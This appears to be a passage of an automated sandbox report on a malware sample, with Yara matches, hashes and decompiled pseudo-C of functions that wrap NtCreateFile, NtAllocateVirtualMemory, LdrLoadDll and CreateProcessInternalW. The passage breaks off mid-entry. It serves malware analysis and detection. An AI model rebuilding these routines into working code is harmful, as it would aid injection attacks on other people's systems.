                                                                      • Instruction ID: 85a69dc183684a973d609cb8bdbc09f3d8068601205e9afe76b317fbab3b50f6
                                                                      • Opcode Fuzzy Hash: 0295ad2201bbe4ca8248bfa478496f91f47a5bbd7172bdd3563921c53ad8ef47
                                                                      • Instruction Fuzzy Hash: C421A5B1D016088BEB58CFABC94429EFAF3AFC8314F14C56EC918AB265EB354506CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30df899deefed3003eac99174157a2bee5cd273cd0e035f7062d4008865b1d24
                                                                      • Instruction ID: 536cf29bdaa04895903d0ce66b3298a8d5e23dfd1703fa47bef72cca7b22b4b1
                                                                      • Opcode Fuzzy Hash: 30df899deefed3003eac99174157a2bee5cd273cd0e035f7062d4008865b1d24
                                                                      • Instruction Fuzzy Hash: F521CF71E016189BEB18CFABD94069EFAF7AFC8210F14C16AD819A7259EB3149468F50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f72c9611912a7c11f746fc398393e1be484939e4de96c8ae19a47713adc7353
                                                                      • Instruction ID: 7501b8ae1dd2a4a8cfd2d8203a9ec4ed605a6a1bbe834ee239dde1ff1847af00
                                                                      • Opcode Fuzzy Hash: 9f72c9611912a7c11f746fc398393e1be484939e4de96c8ae19a47713adc7353
                                                                      • Instruction Fuzzy Hash: FC2197B1D016088BEB58CFABC94429EFAF7AFC8314F14C56AC518AB264EB354506CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1cae0ff10218d5b61ac353af1a657bc14b844866e6790e24c2817dd60e3f063
                                                                      • Instruction ID: 99ca3cc1ec67e3ac4672c3ee0591da761bce0e3ad11236110b16038746a4c0b2
                                                                      • Opcode Fuzzy Hash: b1cae0ff10218d5b61ac353af1a657bc14b844866e6790e24c2817dd60e3f063
                                                                      • Instruction Fuzzy Hash: BE0154B5D052489F8B14CFA9D4418EEFBF1AF5A310F14A16AE894B7310E7309951DF68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
                                                                      • Instruction ID: c151967a8b111465c17afaaaafa33ea01b222428f5ec3b90490182855f4cbb1f
                                                                      • Opcode Fuzzy Hash: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
                                                                      • Instruction Fuzzy Hash: 7DF03FB5D052089F8F14DFA9D5418EEFBF2AB5A310F10A16AE814B3310E73599518FA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      APIs
                                                                      • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                      • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseFileRead
                                                                      • String ID: !:A$b=A$b=A
                                                                      • API String ID: 752142053-704622139
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: !:A$b=A$b=A
                                                                      • API String ID: 2738559852-704622139
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                                      				void* _t18;
                                                                      				void* _t27;
                                                                      				intOrPtr* _t28;
                                                                      
                                                                      				_t13 = _a4;
                                                                      				_t28 = _a4 + 0xc48;
                                                                      				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                      				_t4 =  &_a40; // 0x413a21
                                                                      				_t6 =  &_a32; // 0x413d62
                                                                      				_t12 =  &_a8; // 0x413d62
                                                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                                      				return _t18;
                                                                      			}







                                                                      APIs
                                                                      • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: !:A$b=A$b=A
                                                                      • API String ID: 2738559852-704622139
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                      				char* _v8;
                                                                      				struct _EXCEPTION_RECORD _v12;
                                                                      				struct _OBJDIR_INFORMATION _v16;
                                                                      				char _v536;
                                                                      				void* _t15;
                                                                      				struct _OBJDIR_INFORMATION _t17;
                                                                      				struct _OBJDIR_INFORMATION _t18;
                                                                      				void* _t30;
                                                                      				void* _t31;
                                                                      				void* _t32;
                                                                      
                                                                      				_v8 =  &_v536;
                                                                      				_t15 = E0041AF60( &_v12, 0x104, _a8);
                                                                      				_t31 = _t30 + 0xc;
                                                                      				if(_t15 != 0) {
                                                                      					_t17 = E0041B380(__eflags, _v8);
                                                                      					_t32 = _t31 + 4;
                                                                      					__eflags = _t17;
                                                                      					if(_t17 != 0) {
                                                                      						E0041B600( &_v12, 0);
                                                                      						_t32 = _t32 + 8;
                                                                      					}
                                                                      					_t18 = E00419710(_v8);
                                                                      					_v16 = _t18;
                                                                      					__eflags = _t18;
                                                                      					if(_t18 == 0) {
                                                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                      						return _v16;
                                                                      					}
                                                                      					return _t18;
                                                                      				} else {
                                                                      					return _t15;
                                                                      				}
                                                                      			}














                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E004185CA(signed int __eax, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                                                                      				intOrPtr _v0;
                                                                      				long _t24;
                                                                      				void* _t34;
                                                                      
                                                                      				0xecccdb82(__eax | 0x00000052);
                                                                      				_t18 = _v0;
                                                                      				_t3 = _t18 + 0xc40; // 0xc40
                                                                      				E004191D0(_t34, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
                                                                      				_t24 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                                                                      				return _t24;
                                                                      			}







                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                      				long _t21;
                                                                      				void* _t31;
                                                                      
                                                                      				_t3 = _a4 + 0xc40; // 0xc40
                                                                      				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                      				return _t21;
                                                                      			}






                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                      				long _t14;
                                                                      				void* _t21;
                                                                      
                                                                      				_t3 = _a4 + 0xc60; // 0xca0
                                                                      				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                      				return _t14;
                                                                      			}





                                                                      0x004187bf
                                                                      0x004187c7
                                                                      0x004187e9
                                                                      0x004187ed

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 47ec4ae846ed632dd1f453ce02b494ce5e7c6d77960902e170c2f5c6b913f0fa
                                                                      • Instruction ID: bc6a4b4d8940970a121edcb3a5a4a9ac022a468cf18fb58c54568c7f70a85c8a
                                                                      • Opcode Fuzzy Hash: 47ec4ae846ed632dd1f453ce02b494ce5e7c6d77960902e170c2f5c6b913f0fa
                                                                      • Instruction Fuzzy Hash: 3F9002B530100802D540719A44047460009A7D0345F51C021A5454554ECA998DD976A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                                      				void* _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                      				_t6 =  &_a8; // 0x413526
                                                                      				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}





                                                                      0x004188b7
                                                                      0x004188c2
                                                                      0x004188cd
                                                                      0x004188d1

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: &5A
                                                                      • API String ID: 1279760036-1617645808
                                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                      • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                      • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 74%
                                                                      			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
                                                                      				char _v67;
                                                                      				char _v68;
                                                                      				void* _t12;
                                                                      				int _t13;
                                                                      				long _t20;
                                                                      				intOrPtr _t23;
                                                                      				int _t25;
                                                                      				void* _t28;
                                                                      				void* _t29;
                                                                      				void* _t34;
                                                                      
                                                                      				_t34 = __eflags;
                                                                      				_t28 = _t29;
                                                                      				_v68 = 0;
                                                                      				E0041A130( &_v67, 0, 0x3f);
                                                                      				E0041AD10( &_v68, 3);
                                                                      				_t23 = _a4;
                                                                      				_t12 = E00409B30(_t34, _t23 + 0x1c,  &_v68); // executed
                                                                      				_t13 = E00413E40(_t23 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                      				_t25 = _t13;
                                                                      				if(_t25 != 0) {
                                                                      					_t20 = _a8;
                                                                      					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
                                                                      					_t36 = _t13;
                                                                      					if(_t13 == 0) {
                                                                      						_t13 =  *_t25(_t20, 0x8003, _t28 + (E00409290(_t36, 1, 8) & 0x000000ff) - 0x40, _t13);
                                                                      					}
                                                                      				}
                                                                      				asm("in eax, 0x5d");
                                                                      				return _t13;
                                                                      			}














                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                                      • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
                                                                      • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                                      • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 74%
                                                                      			E00407303(int __eax, void* __ebx, void* __edx, intOrPtr _a4, int _a8, long _a12, int _a16) {
                                                                      				int _v8;
                                                                      				int _v132;
                                                                      				int _v136;
                                                                      				char _v656;
                                                                      				int _v668;
                                                                      				char _v684;
                                                                      				char _v688;
                                                                      				intOrPtr __edi;
                                                                      				int __esi;
                                                                      				void* __ebp;
                                                                      				int _t59;
                                                                      				void* _t60;
                                                                      				long _t68;
                                                                      				void* _t70;
                                                                      				int _t72;
                                                                      				void* _t74;
                                                                      
                                                                      				_t59 = __eax;
                                                                      				_t79 = __ebx - __edx;
                                                                      				_push(__edx);
                                                                      				if(__ebx - __edx > 0) {
                                                                      					L6:
                                                                      					asm("in eax, 0x5d");
                                                                      					return _t59;
                                                                      				} else {
                                                                      					_pop(__ebx);
                                                                      					if(__eflags < 0) {
                                                                      						_t60 = E00409B30(_t79, _t70 + 0x1c, __edx); // executed
                                                                      						_t59 = E00413E40(_t70 + 0x1c, _t60, 0, 0, 0xc4e7b6d6);
                                                                      						_t72 = _t59;
                                                                      						if(_t72 != 0) {
                                                                      							_t68 = _a12;
                                                                      							_t59 = PostThreadMessageW(_t68, 0x111, 0, 0); // executed
                                                                      							_t81 = _t59;
                                                                      							if(_t59 == 0) {
                                                                      								_t59 =  *_t72(_t68, 0x8003, _t74 + (E00409290(_t81, 1, 8) & 0x000000ff) - 0x40, _t59);
                                                                      							}
                                                                      						}
                                                                      						goto L6;
                                                                      					} else {
                                                                      						__eflags = __eax;
                                                                      						_push(__ebp);
                                                                      						__ebp = __esp;
                                                                      						__esp = __esp - 0x2ac;
                                                                      						_push(__ebx);
                                                                      						_push(__esi);
                                                                      						_push(__edi);
                                                                      						__eax = 0;
                                                                      						_v8 = 0;
                                                                      						_v688 = 0;
                                                                      						 &_v684 = E0041A130( &_v684, 0, 0x2a4);
                                                                      						__esi = _a16;
                                                                      						__ecx =  *((intOrPtr*)(__esi + 0x300));
                                                                      						__edi = _a4;
                                                                      						__eax = E00407280(__eflags, _a4,  *((intOrPtr*)(__esi + 0x300))); // executed
                                                                      						__eax = E004199C0(__ecx);
                                                                      						_t12 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
                                                                      						__ebx = __eax + _t12;
                                                                      						_a16 = 0;
                                                                      						while(1) {
                                                                      							__eax = E0040D3C0(__edi, 0xfe363c80); // executed
                                                                      							__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                                                      							__eax =  &_v688;
                                                                      							__eax = E00418770(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
                                                                      							 *(__esi + 0x2dc) = __eax;
                                                                      							__eflags = __eax;
                                                                      							if(__eax < 0) {
                                                                      								break;
                                                                      							}
                                                                      							__eflags = _v656;
                                                                      							if(_v656 == 0) {
                                                                      								L15:
                                                                      								__eax = _a16;
                                                                      								__eax = _a16 + 1;
                                                                      								_a16 = __eax;
                                                                      								__eflags = __eax - 2;
                                                                      								if(__eax < 2) {
                                                                      									continue;
                                                                      								} else {
                                                                      									__ebx = _v8;
                                                                      									goto L19;
                                                                      								}
                                                                      							} else {
                                                                      								__eflags = _v668;
                                                                      								if(_v668 == 0) {
                                                                      									goto L15;
                                                                      								} else {
                                                                      									__eflags = _v136;
                                                                      									if(_v136 == 0) {
                                                                      										goto L15;
                                                                      									} else {
                                                                      										__eflags = _v132;
                                                                      										if(_v132 != 0) {
                                                                      											__eax = _a12;
                                                                      											__edx =  &_v688;
                                                                      											__ebx = 1;
                                                                      											__eax = E0041A0B0(_a12,  &_v688, 0x2a8);
                                                                      											L19:
                                                                      											__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                                                      											__eax = E00418700(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
                                                                      											__eflags = __ebx;
                                                                      											if(__ebx == 0) {
                                                                      												break;
                                                                      											} else {
                                                                      												__edx = _v668;
                                                                      												__eax = _a12;
                                                                      												__ecx = _v136;
                                                                      												 *(_a12 + 0x14) = _v668;
                                                                      												__edx =  *(__esi + 0x2d0);
                                                                      												_t32 = __esi + 0x2e8; // 0x2e8
                                                                      												__eax = _t32;
                                                                      												 *_t32 = _v136;
                                                                      												__eax = _a12;
                                                                      												_t34 = __esi + 0x314; // 0x314
                                                                      												__ebx = _t34;
                                                                      												__ecx = 0;
                                                                      												__eax = _a12 + 0x220;
                                                                      												 *__ebx = 0x18;
                                                                      												 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                                      												 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                                      												 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                                      												 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                                      												 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                                      												__eax = E00417F80(__edi, _a12 + 0x220,  *(__esi + 0x2d0), __ebx, _a12 + 0x220);
                                                                      												__ecx = 0;
                                                                      												 *(__esi + 0x2dc) = __eax;
                                                                      												__eflags = __eax;
                                                                      												if(__eax < 0) {
                                                                      													break;
                                                                      												} else {
                                                                      													__edx = _v132;
                                                                      													_t42 = __esi + 0x2e0; // 0x2e0
                                                                      													__eax = _t42;
                                                                      													 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                                      													 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                                      													 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                                      													 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                                      													 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                                      													_a12 = _a12 + 0x224;
                                                                      													 *(__esi + 0x2e4) = _v132;
                                                                      													 *__ebx = 0x18;
                                                                      													 *(__esi + 0x2d0) = 0x1a;
                                                                      													__eax = E00417FC0(__edi, _a12 + 0x224, 0x1a, __ebx, _t42);
                                                                      													 *(__esi + 0x2dc) = __eax;
                                                                      													__eflags = __eax;
                                                                      													if(__eax < 0) {
                                                                      														break;
                                                                      													} else {
                                                                      														__edx = _a8;
                                                                      														 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
                                                                      														__eflags =  *(__edx + 0x10) + 0x200;
                                                                      														_push(E00419660(__ecx));
                                                                      														__ebx = E00419680();
                                                                      														__eax =  *(__ebx + 0x28);
                                                                      														__eax = E0041A3A0( *(__ebx + 0x28));
                                                                      														__edx =  *(__ebx + 0x28);
                                                                      														_t57 = __eax + 2; // 0x2
                                                                      														__ecx = __eax + _t57;
                                                                      														__eax =  &_v656;
                                                                      														__eax = E00413A40(__edi,  &_v656, 2, 0, 0);
                                                                      														_pop(__edi);
                                                                      														_pop(__esi);
                                                                      														_pop(__ebx);
                                                                      														__esp = __ebp;
                                                                      														_pop(__ebp);
                                                                      														return __eax;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											goto L15;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							goto L23;
                                                                      						}
                                                                      						_pop(__edi);
                                                                      						_pop(__esi);
                                                                      						__eax = 0;
                                                                      						__eflags = 0;
                                                                      						_pop(__ebx);
                                                                      						__esp = __ebp;
                                                                      						_pop(__ebp);
                                                                      						return 0;
                                                                      					}
                                                                      				}
                                                                      				L23:
                                                                      			}



















                                                                      0x004073c4
                                                                      0x004073e0
                                                                      0x004073e8
                                                                      0x004073f0
                                                                      0x004073f5
                                                                      0x004073fd
                                                                      0x004073fd
                                                                      0x00407405
                                                                      0x0040740d
                                                                      0x0040740f
                                                                      0x00000000
                                                                      0x00407411
                                                                      0x00407411
                                                                      0x00407417
                                                                      0x0040741a
                                                                      0x00407420
                                                                      0x00407423
                                                                      0x00407429
                                                                      0x00407429
                                                                      0x00407430
                                                                      0x00407432
                                                                      0x00407435
                                                                      0x00407435
                                                                      0x0040743c
                                                                      0x0040743f
                                                                      0x00407446
                                                                      0x0040744c
                                                                      0x00407452
                                                                      0x00407458
                                                                      0x0040745e
                                                                      0x00407464
                                                                      0x0040746a
                                                                      0x0040746f
                                                                      0x00407474
                                                                      0x0040747a
                                                                      0x0040747c
                                                                      0x00000000
                                                                      0x00407482
                                                                      0x00407482
                                                                      0x00407485
                                                                      0x00407485
                                                                      0x0040748c
                                                                      0x00407492
                                                                      0x00407498
                                                                      0x0040749e
                                                                      0x004074a4
                                                                      0x004074b0
                                                                      0x004074b8
                                                                      0x004074be
                                                                      0x004074c4
                                                                      0x004074ce
                                                                      0x004074d6
                                                                      0x004074dc
                                                                      0x004074de
                                                                      0x00000000
                                                                      0x004074e4
                                                                      0x004074e4
                                                                      0x004074ea
                                                                      0x004074ea
                                                                      0x004074f5
                                                                      0x004074fd
                                                                      0x004074ff
                                                                      0x00407503
                                                                      0x00407508
                                                                      0x0040750b
                                                                      0x0040750b
                                                                      0x0040751b
                                                                      0x00407523
                                                                      0x0040752b
                                                                      0x0040752c
                                                                      0x0040752d
                                                                      0x0040752e
                                                                      0x00407530
                                                                      0x00407531
                                                                      0x00407531
                                                                      0x004074de
                                                                      0x0040747c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004073c4
                                                                      0x004073be
                                                                      0x004073b5
                                                                      0x00000000
                                                                      0x004073ac
                                                                      0x004073d7
                                                                      0x004073d8
                                                                      0x004073d9
                                                                      0x004073d9
                                                                      0x004073db
                                                                      0x004073dc
                                                                      0x004073de
                                                                      0x004073df
                                                                      0x004073df
                                                                      0x00407309
                                                                      0x00000000

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 6f0ce8d0d9df1eaa4cef9bc742a029687e560546f406980c5bc1f5961d88109f
                                                                      • Instruction ID: 12c19b6347be1b8c2bba782a2d6aa6c76b149596bab8c264194dc966899e50ec
                                                                      • Opcode Fuzzy Hash: 6f0ce8d0d9df1eaa4cef9bc742a029687e560546f406980c5bc1f5961d88109f
                                                                      • Instruction Fuzzy Hash: F0F0BE31A802253AF52126A52C43FBF665C5B41F20F26447FFF04F92C2E9AC790242EE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E00418950(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
                                                                      				void* _t22;
                                                                      				void* _t33;
                                                                      				intOrPtr* _t34;
                                                                      
                                                                      				_t3 = _a4 + 0xc80; // 0x8bec97d5
                                                                      				_t34 = _t3;
                                                                      				E004191D0(_t33, _a4, _t34,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x37);
                                                                      				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                                                                      				return _t22;
                                                                      			}







                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,z@,?,?,?), ref: 004189A4
                                                                      Memory Dump Source
